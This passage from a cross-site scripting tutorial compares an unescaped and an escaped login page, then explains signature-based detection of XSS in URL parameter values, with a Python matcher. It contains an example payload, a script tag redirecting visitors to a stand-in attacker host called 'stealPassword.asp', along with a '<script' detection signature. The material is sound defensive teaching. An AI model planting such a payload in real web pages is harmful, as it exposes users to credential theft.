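payload = "<script>document.location='http://www.hax0r.com/stealPassword.asp'</script>"
print(login_page(payload))       # the script tag lands in the page verbatim
print(safe_login_page(payload))  # emitted as harmless &lt;script&gt;... text
```

Output encoding at the point of reflection is the application-side fix; the Prevention section below covers detection on the wire.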

Prevention

Cross-site scripting is one of the easiest attacks to detect, yet many Intrusion Prevention Systems fail to do so. The reason cross-site scripting can be easily detected is that, unlike most application-level attacks, it can be detected using a signature: a simple, fixed text pattern.

To accurately detect cross-site scripting attacks, the product must know where and when to look for that signature. Most cross-site scripting attacks occur either within error pages or within parameter values. Therefore the product needs to look for cross-site scripting signatures either within parameter values or within requests that return error messages. To look for signatures in parameter values, the product must parse the URL correctly, retrieve the value part, and then search the value for the signature while overcoming encoding issues. To look for signatures in pages that return error messages, the product needs to know that the specific URL returned an error code. Intrusion Detection and Prevention Systems that are not Web application oriented simply do not implement these capabilities.
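A sketch of signature matching restricted to decoded parameter values, assuming a single hypothetical "<script" signature and Python's standard URL parsing:

```python
from urllib.parse import urlsplit, parse_qsl

XSS_SIGNATURE = "<script"  # hypothetical single signature

def has_xss_signature(url: str) -> bool:
    # parse_qsl percent-decodes values, so %3Cscript%3E is caught too.
    pairs = parse_qsl(urlsplit(url).query)
    return any(XSS_SIGNATURE in value.lower() for _, value in pairs)

print(has_xss_signature(
    "http://www.somesite.com/Login.asp?ErrorMessage=Invalid+username"))  # False
print(has_xss_signature(
    "http://www.somesite.com/Login.asp"
    "?ErrorMessage=%3Cscript%3Ealert(1)%3C%2Fscript%3E"))  # True
```

Scanning the decoded value rather than the raw request line is what lets the same signature catch both plain and percent-encoded payloads.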
